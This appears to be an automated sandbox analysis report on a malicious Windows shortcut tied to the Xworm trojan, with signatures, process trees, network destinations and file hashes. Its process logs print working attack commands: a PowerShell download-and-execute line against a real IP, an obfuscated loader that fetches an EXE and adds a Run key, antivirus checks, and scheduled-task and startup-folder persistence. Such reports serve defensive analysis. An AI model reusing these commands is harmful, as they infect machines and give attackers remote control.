Analysis Overview
SHA256
b2e7a3022632bed225763f5b5678db00032999a013bd70abcbe134c334f9a831
Threat Level: Known bad
The file b2e7a3022632bed225763f5b5678db00032999a013bd70abcbe134c334f9a831.lnk was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
Detect Xworm Payload
Detects Windows executables referencing non-Windows User-Agents
Downloads MZ/PE file
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Drops startup file
Executes dropped EXE
Checks computer location settings
Adds Run key to start application
Legitimate hosting services abused for malware hosting/C2
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Kills process with taskkill
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Enumerates processes with tasklist
Suspicious use of SetWindowsHookEx
Creates scheduled task(s)
Runs ping.exe
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-12 02:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-12 02:02
Reported
2024-06-12 02:04
Platform
win7-20240215-en
Max time kernel
119s
Max time network
120s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2388 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2388 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2388 wrote to memory of 2592 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\cmd.exe |
| PID 2592 wrote to memory of 2136 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2592 wrote to memory of 2136 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2592 wrote to memory of 2136 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\b2e7a3022632bed225763f5b5678db00032999a013bd70abcbe134c334f9a831.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"
Network
Files
memory/2136-40-0x000007FEF5DBE000-0x000007FEF5DBF000-memory.dmp
memory/2136-41-0x000000001B4D0000-0x000000001B7B2000-memory.dmp
memory/2136-42-0x00000000028E0000-0x00000000028E8000-memory.dmp
memory/2136-43-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-44-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-46-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-45-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-47-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-48-0x000007FEF5DBE000-0x000007FEF5DBF000-memory.dmp
memory/2136-49-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-50-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-51-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
memory/2136-52-0x000007FEF5B00000-0x000007FEF649D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-12 02:02
Reported
2024-06-12 02:04
Platform
win10v2004-20240611-en
Max time kernel
142s
Max time network
151s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 540 created 3472 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | C:\Windows\Explorer.EXE |
| PID 540 created 3472 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | C:\Windows\Explorer.EXE |
| PID 540 created 3472 | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | C:\Windows\Explorer.EXE |
Xworm
Detects Windows executables referencing non-Windows User-Agents
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\MH.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindWave360X.url | C:\Windows\SysWOW64\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindWave360X.url | C:\Windows\SysWOW64\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\MH.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ekHss = "C:\\Users\\Admin\\AppData\\Roaming\\MH.exe" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\b2e7a3022632bed225763f5b5678db00032999a013bd70abcbe134c334f9a831.lnk
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c powershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$url='http://94.154.172.166/wvqv/ex.png';$path='C:\Users\Public\';Invoke-WebRequest -Uri $url -OutFile \"C:\Users\Admin\Downloads\ex.zip\";Expand-Archive -Path \"C:\Users\Admin\Downloads\ex.zip\" -DestinationPath $path;while($true){if(Test-Path 'C:\Users\Public\ex.hta'){Start-Process 'C:\Users\Public\ex.hta';break}else{Start-Sleep 0.5}};Remove-Item -Path \"C:\Users\Admin\Downloads\ex.zip\" -Force;taskkill /F /IM msedge.exe;taskkill /F /IM cmd.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4108,i,8998666007764333392,14724298544432336038,262144 --variations-seed-version --mojo-platform-channel-handle=4464 /prefetch:8
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\ex.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\system32\taskkill.exe
"C:\Windows\system32\taskkill.exe" /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
"C:\Windows\system32\taskkill.exe" /F /IM cmd.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function Ogwbjtfp($T, $u){[IO.File]::WriteAllBytes($T, $u)};function ohbwFx($T){if($T.EndsWith((dQEjGdC @(29246,29300,29308,29308))) -eq $True){Start-Process (dQEjGdC @(29314,29317,29310,29300,29308,29308,29251,29250,29246,29301,29320,29301)) $T}else{Start-Process $T}};function eKBMFfVL($T, $VGRzc){[Microsoft.Win32.Registry]::SetValue((dQEjGdC @(29272,29275,29269,29289,29295,29267,29285,29282,29282,29269,29278,29284,29295,29285,29283,29269,29282,29292,29283,29311,29302,29316,29319,29297,29314,29301,29292,29277,29305,29299,29314,29311,29315,29311,29302,29316,29292,29287,29305,29310,29300,29311,29319,29315,29292,29267,29317,29314,29314,29301,29310,29316,29286,29301,29314,29315,29305,29311,29310,29292,29282,29317,29310)), $VGRzc, $T)};function NWlHxf($N){$He = New-Object (dQEjGdC @(29278,29301,29316,29246,29287,29301,29298,29267,29308,29305,29301,29310,29316));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$u = $He.DownloadData($N);return $u};function dQEjGdC($Q){$W=29200;$H=$Null;foreach($jD in $Q){$H+=[char]($jD-$W)};return $H};function uIIKJuV(){$jtDLr = $env:APPDATA + '\';$iqggj = NWlHxf (dQEjGdC @(29304,29316,29316,29312,29258,29247,29247,29257,29252,29246,29249,29253,29252,29246,29249,29255,29250,29246,29249,29254,29254,29247,29319,29318,29313,29318,29247,29277,29272,29246,29301,29320,29301));$nYlataiU = $jtDLr + 'MH.exe';Ogwbjtfp $nYlataiU $iqggj;ohbwFx $nYlataiU;$VGRzc = 'ekHss';eKBMFfVL $nYlataiU $VGRzc;;;;}uIIKJuV;
C:\Users\Admin\AppData\Roaming\MH.exe
"C:\Users\Admin\AppData\Roaming\MH.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /k copy Adrian Adrian.cmd & Adrian.cmd & exit
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "wrsa.exe opssvc.exe"
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\findstr.exe
findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c md 824903
C:\Windows\SysWOW64\findstr.exe
findstr /V "RELAXATIONTENNISYOURSSCAN" Seek
C:\Windows\SysWOW64\cmd.exe
cmd /c copy /b Measurements + Asked + Report 824903\t
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\Suse.pif
824903\Suse.pif 824903\t
C:\Windows\SysWOW64\PING.EXE
ping -n 5 127.0.0.1
C:\Windows\SysWOW64\cmd.exe
cmd /c schtasks.exe /create /tn "Preferred" /tr "wscript //B 'C:\Users\Admin\AppData\Local\WaveMind360 Elite Innovations Co\MindWave360X.js'" /sc minute /mo 5 /F
C:\Windows\SysWOW64\cmd.exe
cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindWave360X.url" & echo URL="C:\Users\Admin\AppData\Local\WaveMind360 Elite Innovations Co\MindWave360X.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindWave360X.url" & exit
C:\Windows\SysWOW64\schtasks.exe
schtasks.exe /create /tn "Preferred" /tr "wscript //B 'C:\Users\Admin\AppData\Local\WaveMind360 Elite Innovations Co\MindWave360X.js'" /sc minute /mo 5 /F
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\824903\RegAsm.exe
Network
| Country | Destination | Domain | Proto |
| SG | 94.154.172.166:80 | 94.154.172.166 | tcp |
| US | 8.8.8.8:53 | 166.172.154.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| SG | 94.154.172.166:80 | 94.154.172.166 | tcp |
| US | 8.8.8.8:53 | PVgQNHszldiRVxJpoZszvCOlfluc.PVgQNHszldiRVxJpoZszvCOlfluc | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| IE | 52.111.236.22:443 | tcp | |
| NL | 91.92.249.142:8989 | tcp | |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| NL | 91.92.249.142:8989 | tcp | |
| NL | 91.92.249.142:8989 | tcp | |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 91.92.249.142:8989 | tcp | |
| NL | 91.92.249.142:8989 | tcp | |
| NL | 91.92.249.142:8989 | tcp | |
| NL | 91.92.249.142:8989 | tcp | |
| NL | 91.92.249.142:8989 | tcp |
Files
memory/4376-0-0x00007FFCF9193000-0x00007FFCF9195000-memory.dmp
memory/4376-1-0x000001E0F85D0000-0x000001E0F85F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j44kkczl.sja.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4376-11-0x00007FFCF9190000-0x00007FFCF9C51000-memory.dmp
memory/4376-12-0x00007FFCF9190000-0x00007FFCF9C51000-memory.dmp
memory/4376-14-0x00007FFCF9190000-0x00007FFCF9C51000-memory.dmp
memory/4376-15-0x000001E0F8AC0000-0x000001E0F8AD2000-memory.dmp
memory/4376-16-0x000001E0F8A90000-0x000001E0F8A9A000-memory.dmp
C:\Users\Public\ex.hta
| MD5 | eacf551dfa36547012067ef99ecc7b35 |
| SHA1 | a093355da2ac098174d3fe9f47cfb75c890ccb64 |
| SHA256 | 7be03d1f8b55a71b2335ba295346a62a0d5e985637559d2da7c39185731fdd1a |
| SHA512 | aed6203690051eb3e4d9fd5604ee45e760ec939206cfff063c55d0be53994775403241fa2b85007103c40a507bd0eb385a32dd2b0089f4e3596aa22e225c92f3 |
memory/4376-25-0x00007FFCF9190000-0x00007FFCF9C51000-memory.dmp
memory/1696-26-0x0000000004500000-0x0000000004536000-memory.dmp
memory/1696-27-0x0000000004CF0000-0x0000000005318000-memory.dmp
memory/1696-28-0x0000000004C10000-0x0000000004C32000-memory.dmp
memory/1696-29-0x0000000005410000-0x0000000005476000-memory.dmp
memory/1696-30-0x0000000005480000-0x00000000054E6000-memory.dmp
memory/1696-40-0x0000000005680000-0x00000000059D4000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 28571adbb0c6967b9a6c34862c6b565f |
| SHA1 | 76381cfebeedc049fbf674f1152bdfd6d92d2337 |
| SHA256 | 6d00e49a963023342212cecdd4fd11bb15a1894127f1a883bf3d89609132db0b |
| SHA512 | 7293ce620256ae35381e27ae9f0696c6911bea0d12bb70079e8f68b35f8aadcca7dccf8aefdd670761925a50137b017e22ba345bcaa710695c9371649ab93364 |
memory/1696-42-0x0000000005AB0000-0x0000000005ACE000-memory.dmp
memory/1696-43-0x0000000005B00000-0x0000000005B4C000-memory.dmp
memory/1696-44-0x00000000072B0000-0x000000000792A000-memory.dmp
memory/1696-45-0x0000000006060000-0x000000000607A000-memory.dmp
memory/1696-47-0x0000000006FD0000-0x0000000007066000-memory.dmp
memory/1696-48-0x0000000006F70000-0x0000000006F92000-memory.dmp
memory/1696-49-0x000000000CEE0000-0x000000000D484000-memory.dmp
C:\Users\Admin\AppData\Roaming\MH.exe
| MD5 | fb1cd25e6a5154eb70d1f10c56b41ca6 |
| SHA1 | c294d819ff140d153dac91df321b7135d5e59ede |
| SHA256 | 68535d5ca02f0c0bbd40b4ec132111abcb835945095498bb6c5eec282042818f |
| SHA512 | dcd241be029953a436fca00ec3eb8f9d3dd3b78d84c3143bdc7f5fc5829c23b3ad0ff8a04745fb9743edf8fdcb959f2095c4a591fe0b3e0e03fe739abfa48b8b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Adrian
| MD5 | 669bcb845485adbcaed94cee013b506d |
| SHA1 | 6c4e86b2fbd3f1d1a0ae44403a7d8617de533dc6 |
| SHA256 | 879480c9b69cfc918318d9cedcdb5c06038dc1108a9cf6ce9ef63eff89974757 |
| SHA512 | b8719eddda11472f8023b6205b2f225eea1aee861161906b1a6002143b3493c844cab2e315a386d88fac38341860c60be613ded40a073984e4b496942a6dd469 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Seek
| MD5 | 8aca5459b5f158e0ed914703c45bd5b8 |
| SHA1 | 44a0c6306ef7dcbd45ddc1d3143badcb8db4219d |
| SHA256 | 79187028f716e643081f3c14e5cc25ca6280ef8d87b1913663c64bfca1b46a47 |
| SHA512 | c10a6120f108671ebe38b38580364dd2565088b2cf7d7fbba38f738c7424eabfb1362fa765e21ff713affa30016df97f26af249fa85523e38f7236ffed4cb186 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Planned
| MD5 | 99012f57b2e272c1d30b732d3a9f17fd |
| SHA1 | 0f166ffceed30fe753799bd7fbfa4852848f72c2 |
| SHA256 | 4776ce1bebd9bc4890ba149d1b6a6695c7e9d8ac95b932ffb58f02d5f4d14875 |
| SHA512 | f12b81498a5e71edc47de26706b924e5f0f48e4a1096632c4fbf3a286828ea1c09ab04e6dce164df885bee081d5bdfce18def9d43ea1123b4415b4864e3d8fb8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Me
| MD5 | c58fc578f490d1ad28c01b6080af1259 |
| SHA1 | 114fd98f30a53b122f73ea6466d6cb68fe2f0896 |
| SHA256 | 1ae3afce9c7787b42ae8b543fc5412a99a7ff2540116b59c4c3f8b82c75742fa |
| SHA512 | 6afa9b5ec23cb3936fc2a2fb11ea2d63f61ef08ee777a35844aa5209438c52f00e256f42f201eda31fee055f166be2b27a38ab500d1176c5892652800dcca47f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Activists
| MD5 | 05bf8eaa80ed61c659b29fbbc5210e15 |
| SHA1 | 09d54bfe876025303f5f6195adfd3deb9e009695 |
| SHA256 | bee181608b58e65ae70586ce1fea3f8666adbdf180c7a2090e0d7a76307436d1 |
| SHA512 | 7d528b570d48d6d112d636924ac3f2812332a3884c90113fb787c3958ed351e75ab2bb77203816712199bd7310e8e5b0bb70d0ce8809ab088e8464386ebf114f |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Appearance
| MD5 | a02321b286bb90393ee73f07182af12a |
| SHA1 | c4e4bdfccd9754bea38d42a41be8a36e4efdcfd9 |
| SHA256 | ebe905d945c10ad2aa3d31e6faac37fd119e0000b12111b99fdaf436506a6a6e |
| SHA512 | f6b0c2a5d4b773f4f2769cc31f425ad9d1420187ab757d7bfa131612419efc81a98d2358920a0e4e2de08d16ed3907fc8620895822d4c0a0e4372bdcd21fa025 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Accidents
| MD5 | 7c2436e544a3abd424d29343a41366d0 |
| SHA1 | 139e3da90cfca5825161ce8f5af519b1db2c95c0 |
| SHA256 | 01678427aeec32aa7babdeeb5804a48c77eb4b0a8ce75dcaa9dd603a5f27db82 |
| SHA512 | e4725d4ca1b865fc0eb400fa15fdb06a66378c87819447443322a4eb55d1ac8a2715cdadffae10fe28c141fa4bd98aba1ba7a8d53e19ef0ebb9ec775e88ba511 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Jamaica
| MD5 | a39644e2ce927c92272cf8107fb3327b |
| SHA1 | 26c8d5eb1539b64398d9b23913a05ec070773f9c |
| SHA256 | 85d4421aee35da360bb53ae599549fddb4b1463d36770db3fdc1ffb89f985fd0 |
| SHA512 | 015ca51a93ab2ffd345302cb0948ae653b780effc08bd86aea2dfd8098a2a48c94c817059b55dd5325ebb8edcf81ac0d052df2b1ac698f9837bc8272f0786449 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Persistent
| MD5 | 8d2121bb8a9b7ad27e69e1bc957f8979 |
| SHA1 | 3fe2d692d2af03c4d36dfac9f3fde4d00edc1716 |
| SHA256 | aaba07f2e70929d5f4f3912dea2e71495ebca035873037afb9a9a3f678fdc7cf |
| SHA512 | c4fe975c8ee22a53c9131b231612591601035b9401a8f88f05dbdae3edf198d9c119c055df5f4bf44fc1e42ad9a49819a791e412460f776b552a2930bbea84e9 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Numerical
| MD5 | 6c714307641de8c93d261ed9cc77646e |
| SHA1 | 6cba8af80995c69b1952cd36c03b70dbfeb8cae2 |
| SHA256 | cd65eb96896d272cbc5b0983ab6f4e22531234b8d135a74775a6e1cf373b9018 |
| SHA512 | 3fa4f131d511de5bd5f1cddaf888a214e152444045ac1495f2f643aaf6b36d866a81867a53006e6eae6e9670e53b2ab06b84363e1f05dc5efbfed00b014d9a9d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Calvin
| MD5 | 4d19078157a311f1346f191caea7e509 |
| SHA1 | 8121ad256d953cd92cf8dfa9534c1b6faf997832 |
| SHA256 | f6f2c4c9ed18d938a44faeea9da23c817f0fc0768c4aab5e4440c68c16f703a0 |
| SHA512 | db30db32616d0603584cf68691af76f814da57ff1ed0e7914df796d688fb262239041d6089b31f27f09d8f306718b54b3a65070999890becb716672c43c10822 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Endorsement
| MD5 | 4a26c986918b78352da428c9880ca685 |
| SHA1 | cb2f1211d2f87f3b9494d0a83f574b1e58835184 |
| SHA256 | b327e7db0d1ac5cad2b1935a1708bab247664fb009fd923a1153933d24a920bf |
| SHA512 | be84ac35b5d32899fc2a5420df08ffb45eefe510e64f08a7ec9efc5443c18496a679bf4b277754ffb43915e5681bd9c2a628c10b41f94504aa9ed2988225012d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Lesbian
| MD5 | 619654a36360c018f16e384fd1e6b387 |
| SHA1 | b232c087e34fda965d6f88bde7a35664d796f1c3 |
| SHA256 | fa44132bde285d5768d4d952c358b40469304aeb3b66ee8cdb4a54fb575d40c7 |
| SHA512 | dca163feea318903e535d899300df1d7e9ff6c1639c166c0d4ba8060735f081ee931e613b218cb9aa71f198ad9d9569c6dcf667265b904519cae8b8bbf5b71e0 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Spring
| MD5 | 72f0225d667c4395eab1c35726d56f36 |
| SHA1 | c57f5a6d4953b7b7c8fd9fe1c1217b880ca4d9e0 |
| SHA256 | 7b69034a324e195ef42af77762c22b5894b9b36787942fa2cb42390c7d30673a |
| SHA512 | fc7bb12e8984d9fc7ccba5c3ad3b7f2d84ab00a561c0a884d2bde15b8b990bf5682615f49ed0b8ac609a6b5c7e2ac06fc363b852b49c9ba64759ba7b6204ac6a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Fr
| MD5 | fe66f07a1dc3527572e662308b33f2d1 |
| SHA1 | 8eaef41529ddfc9ad45df088b40265d75a590546 |
| SHA256 | e68d5a6047ce198cc348da288cea64dfa8d3cdc534bdb095b123b1c796fbceff |
| SHA512 | 2f6c8e2c1ece9d69f8b7707ee4a0ff9cef3fba652c4ab22172f756563ff2d016326c7e62629d4af11920c7251de4ea78f0b26530340bfca18b1288df5ec2cb0b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Information
| MD5 | 2113d64d2825d8f335cb97226dedcf21 |
| SHA1 | 717127436c7d315618099ef3788b4f8a2efb04f9 |
| SHA256 | 3c83b5d248f30faf27709bf466d8410319d42f31dd02767c2a6cf35488e87578 |
| SHA512 | 9170c1150a348badbdab5aa177f2963bae784e55a22fe273cf9934ae82581c43b80230e4535dc2fa21e7b421712790bf4326aa68c166ed1ade802d0ff7a3ec7d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\Education
| MD5 | e0e36a8fab76f17638d4c66d7bf47387 |
